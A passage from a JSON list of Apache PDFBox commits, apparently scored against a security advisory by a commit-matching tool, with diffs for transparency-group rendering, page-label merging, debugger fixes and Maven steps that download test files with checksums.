backdropHeight)", + "+ {", + "+ backdropRGB = backdrop.getRGB(backdropX, backdropY);", + "+ alpha0 = (backdropRGB >> 24) & 0xFF;", + "+ }", + "+ else", + "+ {", + "+ backdropRGB = 0;", + "+ alpha0 = 0;", + "+ }", + "+", + "+ int groupRGB = groupImage.getRGB(x, y);", + "+ float alphaFactor = alpha0 / alphagn - alpha0 / 255.0f;", + "+", + "+ int r = backdropRemoval(groupRGB, backdropRGB, 16, alphaFactor);", + "+ int g = backdropRemoval(groupRGB, backdropRGB, 8, alphaFactor);", + "+ int b = backdropRemoval(groupRGB, backdropRGB, 0, alphaFactor);", + "+", + "+ groupImage.setRGB(x, y, (alphagn << 24) | (r << 16) | (g << 8) | b);", + "+ }", + "+ }", + "+ }", + "+ }", + "+", + "+ /**", + "+ * Computes the backdrop removal equation.", + "+ * C = Cn + (Cn - C0) * (alpha0 / alphagn - alpha0)", + "+ */", + "+ private int backdropRemoval(int groupRGB, int backdropRGB, int shift, float alphaFactor)", + "+ {", + "+ float cn = (groupRGB >> shift) & 0xFF;", + "+ float c0 = (backdropRGB >> shift) & 0xFF;", + "+ int c = Math.round(cn + (cn - c0) * alphaFactor);", + "+ return (c < 0) ? 0 : (c > 255 ? 255 : c);", + "+ }", + "+}", + "diff --git a/pdfbox/src/main/java/org/apache/pdfbox/rendering/PDFRenderer.java b/pdfbox/src/main/java/org/apache/pdfbox/rendering/PDFRenderer.java", + "index ee2a988cd..6c50da373 100644", + "--- a/pdfbox/src/main/java/org/apache/pdfbox/rendering/PDFRenderer.java", + "+++ b/pdfbox/src/main/java/org/apache/pdfbox/rendering/PDFRenderer.java", + "@@ -57,2 +57,4 @@ public class PDFRenderer", + "+ private BufferedImage pageImage;", + "+", + " /**", + "@@ -207,2 +209,4 @@ public class PDFRenderer", + "+ pageImage = image;", + "+", + " // use a transparent background if the image type supports alpha", + "@@ -362,2 +366,12 @@ public class PDFRenderer", + " }", + "+", + "+ /**", + "+ * Returns the image to which the current page is being rendered.", + "+ * May be null if the page is rendered to a Graphics2D object", + "+ * instead of a BufferedImage.", + "+ */", + "+ BufferedImage getPageImage()", + "+ {", + "+ return pageImage;", + "+ }", + " }", + "diff --git a/pdfbox/src/main/java/org/apache/pdfbox/rendering/PageDrawer.java b/pdfbox/src/main/java/org/apache/pdfbox/rendering/PageDrawer.java", + "index 7bb951943..09ebf0a01 100644", + "--- a/pdfbox/src/main/java/org/apache/pdfbox/rendering/PageDrawer.java", + "+++ b/pdfbox/src/main/java/org/apache/pdfbox/rendering/PageDrawer.java", + "@@ -46,4 +46,7 @@ import java.util.ArrayList;", + " import java.util.HashMap;", + "+import java.util.HashSet;", + " import java.util.List;", + " import java.util.Map;", + "+import java.util.Set;", + "+import java.util.Stack;", + " import org.apache.commons.logging.Log;", + "@@ -55,2 +58,3 @@ import org.apache.pdfbox.cos.COSDictionary;", + " import org.apache.pdfbox.cos.COSName;", + "+import org.apache.pdfbox.pdmodel.PDResources;", + " import org.apache.pdfbox.pdmodel.common.PDRectangle;", + "@@ -60,2 +64,4 @@ import org.apache.pdfbox.pdmodel.font.PDVectorFont;", + " import org.apache.pdfbox.pdmodel.graphics.PDLineDashPattern;", + "+import org.apache.pdfbox.pdmodel.graphics.PDXObject;", + "+import org.apache.pdfbox.pdmodel.graphics.blend.BlendMode;", + " import org.apache.pdfbox.pdmodel.graphics.color.PDColor;", + "@@ -71,2 +77,3 @@ import org.apache.pdfbox.pdmodel.graphics.pattern.PDTilingPattern;", + " import org.apache.pdfbox.pdmodel.graphics.shading.PDShading;", + "+import org.apache.pdfbox.pdmodel.graphics.state.PDExtendedGraphicsState;", + " import org.apache.pdfbox.pdmodel.graphics.state.PDGraphicsState;", + "@@ -129,2 +136,4 @@ public class PageDrawer extends PDFGraphicsStreamEngine", + "+ private final Stack transparencyGroupStack = new Stack<>();", + "+", + " /**", + "@@ -1274,2 +1283,4 @@ public class PageDrawer extends PDFGraphicsStreamEngine", + " private final int minY;", + "+ private final int maxX;", + "+ private final int maxY;", + " private final int width;", + "@@ -1311,2 +1322,4 @@ public class PageDrawer extends PDFGraphicsStreamEngine", + " minY = 0;", + "+ maxX = 0;", + "+ maxY = 0;", + " width = 0;", + "@@ -1325,4 +1338,4 @@ public class PageDrawer extends PDFGraphicsStreamEngine", + " minY = (int) Math.floor(bounds.getMinY());", + "- int maxX = (int) Math.floor(bounds.getMaxX()) + 1;", + "- int maxY = (int) Math.floor(bounds.getMaxY()) + 1;", + "+ maxX = (int) Math.floor(bounds.getMaxX()) + 1;", + "+ maxY = (int) Math.floor(bounds.getMaxY()) + 1;", + "@@ -1340,3 +1353,36 @@ public class PageDrawer extends PDFGraphicsStreamEngine", + " }", + "+", + "+ boolean needsBackdrop = !isSoftMask && !form.getGroup().isIsolated() &&", + "+ hasBlendMode(form, new HashSet());", + "+ BufferedImage backdropImage = null;", + "+ // Position of this group in parent group's coordinates", + "+ int backdropX = 0;", + "+ int backdropY = 0;", + "+ if (needsBackdrop)", + "+ {", + "+ if (transparencyGroupStack.isEmpty())", + "+ {", + "+ // Use the current page as the parent group.", + "+ backdropImage = renderer.getPageImage();", + "+ needsBackdrop = backdropImage != null;", + "+ backdropX = minX;", + "+ backdropY = (backdropImage != null) ? (backdropImage.getHeight() - maxY) : 0;", + "+ }", + "+ else", + "+ {", + "+ TransparencyGroup parentGroup = transparencyGroupStack.peek();", + "+ backdropImage = parentGroup.image;", + "+ backdropX = minX - parentGroup.minX;", + "+ backdropY = parentGroup.maxY - maxY;", + "+ }", + "+ }", + "+", + " Graphics2D g = image.createGraphics();", + "+ if (needsBackdrop)", + "+ {", + "+ // backdropImage must be included in group image but not in group alpha.", + "+ g.drawImage(backdropImage, 0, 0, width, height,", + "+ backdropX, backdropY, backdropX + width, backdropY + height, null);", + "+ g = new GroupGraphics(image, g);", + "+ }", + " if (isSoftMask && backdropColor != null)", + "@@ -1388,3 +1434,8 @@ public class PageDrawer extends PDFGraphicsStreamEngine", + " {", + "+ transparencyGroupStack.push(this);", + " processTransparencyGroup(form);", + "+ if (!transparencyGroupStack.isEmpty())", + "+ {", + "+ transparencyGroupStack.pop();", + "+ }", + " }", + "@@ -1403,2 +1454,7 @@ public class PageDrawer extends PDFGraphicsStreamEngine", + " }", + "+", + "+ if (needsBackdrop)", + "+ {", + "+ ((GroupGraphics) g).removeBackdrop(backdropImage, backdropX, backdropY);", + "+ }", + " }", + "@@ -1478,2 +1534,52 @@ public class PageDrawer extends PDFGraphicsStreamEngine", + " }", + "+", + "+ private boolean hasBlendMode(PDTransparencyGroup group, Set groupsDone)", + "+ {", + "+ if (groupsDone.contains(group.getCOSObject()))", + "+ {", + "+ // The group was already processed. Avoid endless recursion.", + "+ return false;", + "+ }", + "+ groupsDone.add(group.getCOSObject());", + "+", + "+ PDResources resources = group.getResources();", + "+ if (resources == null)", + "+ {", + "+ return false;", + "+ }", + "+ for (COSName name : resources.getExtGStateNames())", + "+ {", + "+ PDExtendedGraphicsState extGState = resources.getExtGState(name);", + "+ if (extGState == null)", + "+ {", + "+ continue;", + "+ }", + "+ BlendMode blendMode = extGState.getBlendMode();", + "+ if (blendMode != BlendMode.NORMAL)", + "+ {", + "+ return true;", + "+ }", + "+ }", + "+", + "+ // Recursively process nested transparency groups", + "+ for (COSName name : resources.getXObjectNames())", + "+ {", + "+ PDXObject xObject;", + "+ try", + "+ {", + "+ xObject = resources.getXObject(name);", + "+ }", + "+ catch (IOException ex)", + "+ {", + "+ continue;", + "+ }", + "+ if (xObject instanceof PDTransparencyGroup &&", + "+ hasBlendMode((PDTransparencyGroup)xObject, groupsDone))", + "+ {", + "+ return true;", + "+ }", + "+ }", + "+", + "+ return false;", + "+ }", + " }" + ], + "changed_files": [ + "pdfbox/src/main/java/org/apache/pdfbox/rendering/GroupGraphics.java", + "pdfbox/src/main/java/org/apache/pdfbox/rendering/PDFRenderer.java", + "pdfbox/src/main/java/org/apache/pdfbox/rendering/PageDrawer.java" + ], + "message_reference_content": [], + "jira_refs": { + "PDFBOX-3000": "" + }, + "ghissue_refs": {}, + "cve_refs": [], + "twins": [ + [ + "no-tag", + "c5cc36811a34e99722f70426b107ace59a5f7c8e" + ] + ], + "tags": [ + "3.0.0", + "3.0.0-RC1", + "3.0.0-alpha2", + "3.0.0-alpha3", + "3.0.0-beta1", + "3.0.1", + "3.0.2" + ], + "matched_rules": [ + { + "id": "CHANGES_RELEVANT_CODE", + "message": "The commit modifies code containing relevant filename or methods: PDF", + "relevance": 8 + }, + { + "id": "ADV_KEYWORDS_IN_FILES", + "message": "An advisory keyword is contained in the changed files: page", + "relevance": 4 + }, + { + "id": "COMMIT_HAS_TWINS", + "message": "This commit has one or more twins.", + "relevance": 2 + }, + { + "id": "BUG_IN_MESSAGE", + "message": "The commit message references some bug tracking ticket: PDFBOX-3000", + "relevance": 2 + } + ] + }, + { + "commit_id": "d02495dedb4c5984759662ede249afbb362166cb", + "repository": "https://github.com/apache/pdfbox", + "timestamp": 1527421505, + "hunks": 1, + "message": "PDFBOX-4184: remote loading of test file 032163.jpg / http://www.crh.noaa.gov/Image/gjt/images/ImageGallery/Uncompahgre_small.jpg git-svn-id: https://svn.apache.org/repos/asf/pdfbox/branches/2.0@1832328 13f79535-47bb-0310-9956-ffa450edef68", + "diff": [ + "diff --git a/pdfbox/pom.xml b/pdfbox/pom.xml", + "index fa49e21ea..1d8bd38d8 100644", + "--- a/pdfbox/pom.xml", + "+++ b/pdfbox/pom.xml", + "@@ -408,2 +408,17 @@", + " ", + "+ ", + "+ PDFBOX-4184", + "+ generate-test-resources", + "+ ", + "+ wget", + "+ ", + "+ ", + "+ http://www.crh.noaa.gov/Image/gjt/images/ImageGallery/Uncompahgre_small.jpg", + "+ ", + "+ ${project.build.directory}/imgs", + "+ PDFBOX-4184-032163.jpg", + "+ 35241c979d3808ca9d2641b5ec5e40637132b313f75070faca8b8f6d00ddce394070414236db3993f1092fe3bc16995750d528b6d803a7851423c14c308ccdde", + "+ ", + "+ ", + " " + ], + "changed_files": [ + "pdfbox/pom.xml" + ], + "message_reference_content": [], + "jira_refs": { + "PDFBOX-4184": "" + }, + "ghissue_refs": {}, + "cve_refs": [], + "twins": [ + [ + "no-tag", + "db5f3c003fe96619591abbd3433b997149b9b97a" + ] + ], + "tags": [ + "2.0.10", + "2.0.11", + "2.0.12", + "2.0.13", + "2.0.14", + "2.0.15", + "2.0.16", + "2.0.17", + "2.0.18", + "2.0.19", + "2.0.20", + "2.0.21", + "2.0.22", + "2.0.23", + "2.0.24", + "2.0.25", + "2.0.26", + "2.0.27", + "2.0.28", + "2.0.29", + "2.0.30", + "2.0.31", + "2.0.32" + ], + "matched_rules": [ + { + "id": "CHANGES_RELEVANT_CODE", + "message": "The commit modifies code containing relevant filename or methods: PDF", + "relevance": 8 + }, + { + "id": "ADV_KEYWORDS_IN_MSG", + "message": "The commit message and the advisory description contain the following keywords: file", + "relevance": 4 + }, + { + "id": "COMMIT_HAS_TWINS", + "message": "This commit has one or more twins.", + "relevance": 2 + }, + { + "id": "BUG_IN_MESSAGE", + "message": "The commit message references some bug tracking ticket: PDFBOX-4184", + "relevance": 2 + } + ] + }, + { + "commit_id": "4c19d42c392e0d536a2a138b93d99d323c596290", + "repository": "https://github.com/apache/pdfbox", + "timestamp": 1526586017, + "hunks": 1, + "message": "PDFBOX-4222: skip bad page label entry git-svn-id: https://svn.apache.org/repos/asf/pdfbox/trunk@1831804 13f79535-47bb-0310-9956-ffa450edef68", + "diff": [ + "diff --git a/pdfbox/src/main/java/org/apache/pdfbox/multipdf/PDFMergerUtility.java b/pdfbox/src/main/java/org/apache/pdfbox/multipdf/PDFMergerUtility.java", + "index 27ae233e4..59e07ffa8 100644", + "--- a/pdfbox/src/main/java/org/apache/pdfbox/multipdf/PDFMergerUtility.java", + "+++ b/pdfbox/src/main/java/org/apache/pdfbox/multipdf/PDFMergerUtility.java", + "@@ -611,3 +611,9 @@ public class PDFMergerUtility", + " {", + "- COSNumber labelIndex = (COSNumber) srcNums.getObject(i);", + "+ COSBase base = srcNums.getObject(i);", + "+ if (!(base instanceof COSNumber))", + "+ {", + "+ LOG.warn(\"page labels skipped at index \" + i + \", should be a number, but is \" + base);", + "+ break;", + "+ }", + "+ COSNumber labelIndex = (COSNumber) base;", + " long labelIndexValue = labelIndex.intValue();" + ], + "changed_files": [ + "pdfbox/src/main/java/org/apache/pdfbox/multipdf/PDFMergerUtility.java" + ], + "message_reference_content": [], + "jira_refs": { + "PDFBOX-4222": "" + }, + "ghissue_refs": {}, + "cve_refs": [], + "twins": [ + [ + "no-tag", + "579a4335f38308336dcb1615d2933871f299a5c3" + ] + ], + "tags": [ + "3.0.0", + "3.0.0-RC1", + "3.0.0-alpha2", + "3.0.0-alpha3", + "3.0.0-beta1", + "3.0.1", + "3.0.2" + ], + "matched_rules": [ + { + "id": "CHANGES_RELEVANT_CODE", + "message": "The commit modifies code containing relevant filename or methods: PDF", + "relevance": 8 + }, + { + "id": "ADV_KEYWORDS_IN_MSG", + "message": "The commit message and the advisory description contain the following keywords: page", + "relevance": 4 + }, + { + "id": "COMMIT_HAS_TWINS", + "message": "This commit has one or more twins.", + "relevance": 2 + }, + { + "id": "BUG_IN_MESSAGE", + "message": "The commit message references some bug tracking ticket: PDFBOX-4222", + "relevance": 2 + } + ] + }, + { + "commit_id": "80726dc0fafc848ae496a25e37e1f4ad9fe3605b", + "repository": "https://github.com/apache/pdfbox", + "timestamp": 1530475029, + "hunks": 1, + "message": "PDFBOX-4184: add remote loading of 16 bit ARGB test file git-svn-id: https://svn.apache.org/repos/asf/pdfbox/trunk@1834803 13f79535-47bb-0310-9956-ffa450edef68", + "diff": [ + "diff --git a/pdfbox/pom.xml b/pdfbox/pom.xml", + "index 9e8b2e034..ba4f2b4a7 100644", + "--- a/pdfbox/pom.xml", + "+++ b/pdfbox/pom.xml", + "@@ -422,2 +422,21 @@", + " ", + "+ ", + "+ PDFBOX-4184-2", + "+ generate-test-resources", + "+ ", + "+ wget", + "+ ", + "+ ", + "+ https://issues.apache.org/jira/secure/attachment/12929821/16bit.png", + "+ ", + "+ ${project.build.directory}/imgs", + "+ PDFBOX-4184-16bit.png", + "+ 45f148913590ea1a94c3ac17080969b74e579fe51967a5bf535caa3f7104ea81ee222b99deb8ee528b0a53640f97d87cf668633a1bdd61a62092246df1807471", + "+ ", + "+ ", + " " + ], + "changed_files": [ + "pdfbox/pom.xml" + ], + "message_reference_content": [], + "jira_refs": { + "PDFBOX-4184": "" + }, + "ghissue_refs": {}, + "cve_refs": [], + "twins": [ + [ + "no-tag", + "3ab0c52abcdabb34e77cb80655a630cc28957096" + ] + ], + "tags": [ + "3.0.0", + "3.0.0-RC1", + "3.0.0-alpha2", + "3.0.0-alpha3", + "3.0.0-beta1", + "3.0.1", + "3.0.2" + ], + "matched_rules": [ + { + "id": "CHANGES_RELEVANT_CODE", + "message": "The commit modifies code containing relevant filename or methods: PDF", + "relevance": 8 + }, + { + "id": "ADV_KEYWORDS_IN_MSG", + "message": "The commit message and the advisory description contain the following keywords: file", + "relevance": 4 + }, + { + "id": "COMMIT_HAS_TWINS", + "message": "This commit has one or more twins.", + "relevance": 2 + }, + { + "id": "BUG_IN_MESSAGE", + "message": "The commit message references some bug tracking ticket: PDFBOX-4184", + "relevance": 2 + } + ] + }, + { + "commit_id": "87fdaa9fc2ac7856b0dffa4634e120c3174733a9", + "repository": "https://github.com/apache/pdfbox", + "timestamp": 1529524811, + "hunks": 1, + "message": "PDFBOX-4248: avoid NPE which can happen with a Batik graphics object git-svn-id: https://svn.apache.org/repos/asf/pdfbox/branches/2.0@1833946 13f79535-47bb-0310-9956-ffa450edef68", + "diff": [ + "diff --git a/pdfbox/src/main/java/org/apache/pdfbox/rendering/PageDrawer.java b/pdfbox/src/main/java/org/apache/pdfbox/rendering/PageDrawer.java", + "index c35848a66..0c29295fa 100644", + "--- a/pdfbox/src/main/java/org/apache/pdfbox/rendering/PageDrawer.java", + "+++ b/pdfbox/src/main/java/org/apache/pdfbox/rendering/PageDrawer.java", + "@@ -1245,3 +1245,8 @@ public class PageDrawer extends PDFGraphicsStreamEngine", + " // Example for NoZoom can be found in p5 of PDFBOX-2348", + "- int deviceType = graphics.getDeviceConfiguration().getDevice().getType();", + "+ int deviceType = -1;", + "+ if (graphics.getDeviceConfiguration() != null && ", + "+ graphics.getDeviceConfiguration().getDevice() != null)", + "+ {", + "+ deviceType = graphics.getDeviceConfiguration().getDevice().getType();", + "+ }", + " if (deviceType == GraphicsDevice.TYPE_PRINTER && !annotation.isPrinted())" + ], + "changed_files": [ + "pdfbox/src/main/java/org/apache/pdfbox/rendering/PageDrawer.java" + ], + "message_reference_content": [], + "jira_refs": { + "PDFBOX-4248": "" + }, + "ghissue_refs": {}, + "cve_refs": [], + "twins": [ + [ + "no-tag", + "48bc5e90b987d43eb28536a6956d387f9f9d723b" + ] + ], + "tags": [ + "2.0.11", + "2.0.12", + "2.0.13", + "2.0.14", + "2.0.15", + "2.0.16", + "2.0.17", + "2.0.18", + "2.0.19", + "2.0.20", + "2.0.21", + "2.0.22", + "2.0.23", + "2.0.24", + "2.0.25", + "2.0.26", + "2.0.27", + "2.0.28", + "2.0.29", + "2.0.30", + "2.0.31", + "2.0.32" + ], + "matched_rules": [ + { + "id": "CHANGES_RELEVANT_CODE", + "message": "The commit modifies code containing relevant filename or methods: PDF", + "relevance": 8 + }, + { + "id": "ADV_KEYWORDS_IN_FILES", + "message": "An advisory keyword is contained in the changed files: page", + "relevance": 4 + }, + { + "id": "COMMIT_HAS_TWINS", + "message": "This commit has one or more twins.", + "relevance": 2 + }, + { + "id": "BUG_IN_MESSAGE", + "message": "The commit message references some bug tracking ticket: PDFBOX-4248", + "relevance": 2 + } + ] + }, + { + "commit_id": "1cd8c52437689c60b10241675343c5624f8a27f6", + "repository": "https://github.com/apache/pdfbox", + "timestamp": 1526588954, + "hunks": 2, + "message": "PDFBOX-4222: ignore all page labels if there is a bad entry (similar to Adobe Reader) git-svn-id: https://svn.apache.org/repos/asf/pdfbox/branches/2.0@1831811 13f79535-47bb-0310-9956-ffa450edef68", + "diff": [ + "diff --git a/pdfbox/src/main/java/org/apache/pdfbox/multipdf/PDFMergerUtility.java b/pdfbox/src/main/java/org/apache/pdfbox/multipdf/PDFMergerUtility.java", + "index 3634fbeaf..5f613e3a4 100644", + "--- a/pdfbox/src/main/java/org/apache/pdfbox/multipdf/PDFMergerUtility.java", + "+++ b/pdfbox/src/main/java/org/apache/pdfbox/multipdf/PDFMergerUtility.java", + "@@ -621,2 +621,3 @@ public class PDFMergerUtility", + " {", + "+ int startSize = destNums.size();", + " for (int i = 0; i < srcNums.size(); i += 2)", + "@@ -626,3 +627,8 @@ public class PDFMergerUtility", + " {", + "- LOG.warn(\"page labels skipped at index \" + i + \", should be a number, but is \" + base);", + "+ LOG.error(\"page labels ignored, index \" + i + \" should be a number, but is \" + base);", + "+ // remove what we added", + "+ while (destNums.size() > startSize)", + "+ {", + "+ destNums.remove(startSize);", + "+ }", + " break;" + ], + "changed_files": [ + "pdfbox/src/main/java/org/apache/pdfbox/multipdf/PDFMergerUtility.java" + ], + "message_reference_content": [], + "jira_refs": { + "PDFBOX-4222": "" + }, + "ghissue_refs": {}, + "cve_refs": [], + "twins": [ + [ + "no-tag", + "a0eec9d373afe4d8f52886923ffe15929bdb0e7f" + ], + [ + "no-tag", + "e1ab9f22ad27ffd482637d7b0788ac3a9264ddd6" + ], + [ + "no-tag", + "9a3b2af822f855ab299dbc6415052ab559fbf40e" + ] + ], + "tags": [ + "2.0.10", + "2.0.11", + "2.0.12", + "2.0.13", + "2.0.14", + "2.0.15", + "2.0.16", + "2.0.17", + "2.0.18", + "2.0.19", + "2.0.20", + "2.0.21", + "2.0.22", + "2.0.23", + "2.0.24", + "2.0.25", + "2.0.26", + "2.0.27", + "2.0.28", + "2.0.29", + "2.0.30", + "2.0.31", + "2.0.32" + ], + "matched_rules": [ + { + "id": "CHANGES_RELEVANT_CODE", + "message": "The commit modifies code containing relevant filename or methods: PDF", + "relevance": 8 + }, + { + "id": "ADV_KEYWORDS_IN_MSG", + "message": "The commit message and the advisory description contain the following keywords: page", + "relevance": 4 + }, + { + "id": "COMMIT_HAS_TWINS", + "message": "This commit has one or more twins.", + "relevance": 2 + }, + { + "id": "BUG_IN_MESSAGE", + "message": "The commit message references some bug tracking ticket: PDFBOX-4222", + "relevance": 2 + } + ] + }, + { + "commit_id": "bb8d553c042e48c3fba7315f86917bd068d9bef0", + "repository": "https://github.com/apache/pdfbox", + "timestamp": 1524906205, + "hunks": 3, + "message": "PDFBOX-4207: apply default transform to mouse coordinates git-svn-id: https://svn.apache.org/repos/asf/pdfbox/branches/2.0@1830415 13f79535-47bb-0310-9956-ffa450edef68", + "diff": [ + "diff --git a/debugger/src/main/java/org/apache/pdfbox/debugger/pagepane/PagePane.java b/debugger/src/main/java/org/apache/pdfbox/debugger/pagepane/PagePane.java", + "index 80f540d65..4945ec465 100644", + "--- a/debugger/src/main/java/org/apache/pdfbox/debugger/pagepane/PagePane.java", + "+++ b/debugger/src/main/java/org/apache/pdfbox/debugger/pagepane/PagePane.java", + "@@ -71,2 +71,4 @@ public class PagePane implements ActionListener, AncestorListener, MouseMotionLi", + " private final Map rectMap = new HashMap();", + "+ private final AffineTransform defaultTransform = GraphicsEnvironment.getLocalGraphicsEnvironment().", + "+ getDefaultScreenDevice().getDefaultConfiguration().getDefaultTransform();", + "@@ -216,4 +218,4 @@ public class PagePane implements ActionListener, AncestorListener, MouseMotionLi", + " float zoomScale = zoomMenu.getPageZoomScale();", + "- float x = e.getX() / zoomScale;", + "- float y = e.getY() / zoomScale;", + "+ float x = e.getX() / zoomScale * (float) defaultTransform.getScaleX();", + "+ float y = e.getY() / zoomScale * (float) defaultTransform.getScaleY();", + " int x1, y1;", + "@@ -325,6 +327,4 @@ public class PagePane implements ActionListener, AncestorListener, MouseMotionLi", + " // See PDFBOX-3665 for more sample code and discussion.", + "- AffineTransform tx = GraphicsEnvironment.getLocalGraphicsEnvironment().", + "- getDefaultScreenDevice().getDefaultConfiguration().getDefaultTransform();", + "- label.setSize((int) Math.ceil(image.getWidth() / tx.getScaleX()), ", + "- (int) Math.ceil(image.getHeight() / tx.getScaleY()));", + "+ label.setSize((int) Math.ceil(image.getWidth() / defaultTransform.getScaleX()), ", + "+ (int) Math.ceil(image.getHeight() / defaultTransform.getScaleY()));", + " label.setIcon(new HighResolutionImageIcon(image, label.getWidth(), label.getHeight()));" + ], + "changed_files": [ + "debugger/src/main/java/org/apache/pdfbox/debugger/pagepane/PagePane.java" + ], + "message_reference_content": [], + "jira_refs": { + "PDFBOX-4207": "" + }, + "ghissue_refs": {}, + "cve_refs": [], + "twins": [ + [ + "no-tag", + "bb0ef8d3c645ffaf9b8bc37f4e44314a3ec42eae" + ] + ], + "tags": [ + "2.0.10", + "2.0.11", + "2.0.12", + "2.0.13", + "2.0.14", + "2.0.15", + "2.0.16", + "2.0.17", + "2.0.18", + "2.0.19", + "2.0.20", + "2.0.21", + "2.0.22", + "2.0.23", + "2.0.24", + "2.0.25", + "2.0.26", + "2.0.27", + "2.0.28", + "2.0.29", + "2.0.30", + "2.0.31", + "2.0.32" + ], + "matched_rules": [ + { + "id": "CHANGES_RELEVANT_CODE", + "message": "The commit modifies code containing relevant filename or methods: PDF", + "relevance": 8 + }, + { + "id": "ADV_KEYWORDS_IN_FILES", + "message": "An advisory keyword is contained in the changed files: page", + "relevance": 4 + }, + { + "id": "COMMIT_HAS_TWINS", + "message": "This commit has one or more twins.", + "relevance": 2 + }, + { + "id": "BUG_IN_MESSAGE", + "message": "The commit message references some bug tracking ticket: PDFBOX-4207", + "relevance": 2 + } + ] + }, + { + "commit_id": "761812d62258990706048dd55d06ded4d2ac5ef5", + "repository": "https://github.com/apache/pdfbox", + "timestamp": 1524160171, + "hunks": 1, + "message": "PDFBOX-4197: load test file into repository git-svn-id: https://svn.apache.org/repos/asf/pdfbox/branches/2.0@1829583 13f79535-47bb-0310-9956-ffa450edef68", + "diff": [ + "diff --git a/pdfbox/pom.xml b/pdfbox/pom.xml", + "index 04e597c5c..fa49e21ea 100644", + "--- a/pdfbox/pom.xml", + "+++ b/pdfbox/pom.xml", + "@@ -395,2 +395,15 @@", + " ", + "+ ", + "+ PDFBOX-4197", + "+ generate-test-resources", + "+ ", + "+ wget", + "+ ", + "+ ", + "+ https://issues.apache.org/jira/secure/attachment/12919726/sample.pdf", + "+ ${project.build.directory}/pdfs", + "+ PDFBOX-4197.pdf", + "+ 6fefc869dff9db8cd539db177d35beeacc62304173245742eaee8882dab330860a31cbbd4c4ec6cc724603cc453afc07ec61361fbc1e80a47f44b04ccfbaf40d", + "+ ", + "+ ", + " " + ], + "changed_files": [ + "pdfbox/pom.xml" + ], + "message_reference_content": [], + "jira_refs": { + "PDFBOX-4197": "" + }, + "ghissue_refs": {}, + "cve_refs": [], + "twins": [ + [ + "no-tag", + "4a8dc72196312c2b3cd3989946ab226568f52089" + ] + ], + "tags": [ + "2.0.10", + "2.0.11", + "2.0.12", + "2.0.13", + "2.0.14", + "2.0.15", + "2.0.16", + "2.0.17", + "2.0.18", + "2.0.19", + "2.0.20", + "2.0.21", + "2.0.22", + "2.0.23", + "2.0.24", + "2.0.25", + "2.0.26", + "2.0.27", + "2.0.28", + "2.0.29", + "2.0.30", + "2.0.31", + "2.0.32" + ], + "matched_rules": [ + { + "id": "CHANGES_RELEVANT_CODE", + "message": "The commit modifies code containing relevant filename or methods: PDF", + "relevance": 8 + }, + { + "id": "ADV_KEYWORDS_IN_MSG", + "message": "The commit message and the advisory description contain the following keywords: file", + "relevance": 4 + }, + { + "id": "COMMIT_HAS_TWINS", + "message": "This commit has one or more twins.", + "relevance": 2 + }, + { + "id": "BUG_IN_MESSAGE", + "message": "The commit message references some bug tracking ticket: PDFBOX-4197", + "relevance": 2 + } + ] + }, + { + "commit_id": "d41ed6df8a80be126aeb3a186ec184b97b406502", + "repository": "https://github.com/apache/pdfbox", + "timestamp": 1523986405, + "hunks": 3, + "message": "PDFBOX-2941: trigger another premature initialization for more accurate rendering benchmarks git-svn-id: https://svn.apache.org/repos/asf/pdfbox/branches/2.0@1829377 13f79535-47bb-0310-9956-ffa450edef68", + "diff": [ + "diff --git a/debugger/src/main/java/org/apache/pdfbox/debugger/PDFDebugger.java b/debugger/src/main/java/org/apache/pdfbox/debugger/PDFDebugger.java", + "index bc8258239..c59fb8880 100644", + "--- a/debugger/src/main/java/org/apache/pdfbox/debugger/PDFDebugger.java", + "+++ b/debugger/src/main/java/org/apache/pdfbox/debugger/PDFDebugger.java", + "@@ -108,2 +108,3 @@ import org.apache.pdfbox.debugger.ui.Tree;", + " import org.apache.pdfbox.debugger.ui.ZoomMenu;", + "+import org.apache.pdfbox.filter.FilterFactory;", + " import org.apache.pdfbox.io.IOUtils;", + "@@ -112,3 +113,2 @@ import org.apache.pdfbox.pdmodel.common.PDPageLabels;", + " import org.apache.pdfbox.pdmodel.encryption.InvalidPasswordException;", + "-import org.apache.pdfbox.pdmodel.font.PDFont;", + " import org.apache.pdfbox.pdmodel.font.PDType1Font;", + "@@ -1206,2 +1206,3 @@ public class PDFDebugger extends JFrame", + " IIORegistry.getDefaultInstance();", + "+ FilterFactory.INSTANCE.getFilter(COSName.FLATE_DECODE);", + " }" + ], + "changed_files": [ + "debugger/src/main/java/org/apache/pdfbox/debugger/PDFDebugger.java" + ], + "message_reference_content": [], + "jira_refs": { + "PDFBOX-2941": "" + }, + "ghissue_refs": {}, + "cve_refs": [], + "twins": [ + [ + "no-tag", + "1111b63e45417eda967afb9eec1d56c02ede3178" + ] + ], + "tags": [ + "2.0.10", + "2.0.11", + "2.0.12", + "2.0.13", + "2.0.14", + "2.0.15", + "2.0.16", + "2.0.17", + "2.0.18", + "2.0.19", + "2.0.20", + "2.0.21", + "2.0.22", + "2.0.23", + "2.0.24", + "2.0.25", + "2.0.26", + "2.0.27", + "2.0.28", + "2.0.29", + "2.0.30", + "2.0.31", + "2.0.32" + ], + "matched_rules": [ + { + "id": "CHANGES_RELEVANT_CODE", + "message": "The commit modifies code containing relevant filename or methods: PDF", + "relevance": 8 + }, + { + "id": "ADV_KEYWORDS_IN_MSG", + "message": "The commit message and the advisory description contain the following keywords: trigger", + "relevance": 4 + }, + { + "id": "COMMIT_HAS_TWINS", + "message": "This commit has one or more twins.", + "relevance": 2 + }, + { + "id": "BUG_IN_MESSAGE", + "message": "The commit message references some bug tracking ticket: PDFBOX-2941", + "relevance": 2 + } + ] + }, + { + "commit_id": "a6b2cf98e431f0815251d2e41a1e61a5e7d5e110", + "repository": "https://github.com/apache/pdfbox", + "timestamp": 1529331713, + "hunks": 1, + "message": "PDFBOX-4245: revert because of regression git-svn-id: https://svn.apache.org/repos/asf/pdfbox/trunk@1833726 13f79535-47bb-0310-9956-ffa450edef68", + "diff": [ + "diff --git a/pdfbox/src/main/java/org/apache/pdfbox/rendering/PageDrawer.java b/pdfbox/src/main/java/org/apache/pdfbox/rendering/PageDrawer.java", + "index 7b16f95fa..8b0a25235 100644", + "--- a/pdfbox/src/main/java/org/apache/pdfbox/rendering/PageDrawer.java", + "+++ b/pdfbox/src/main/java/org/apache/pdfbox/rendering/PageDrawer.java", + "@@ -1468,5 +1468,4 @@ public class PageDrawer extends PDFGraphicsStreamEngine", + " // Flip y", + "- // PDFBOX-4245 also consider translation in xform", + "- return new Rectangle2D.Double(minX - pageSize.getLowerLeftX() * m.getScalingFactorX() + xform.getTranslateX(),", + "- size.getY() - minY - height + pageSize.getLowerLeftY() * m.getScalingFactorY() + xform.getTranslateY(),", + "+ return new 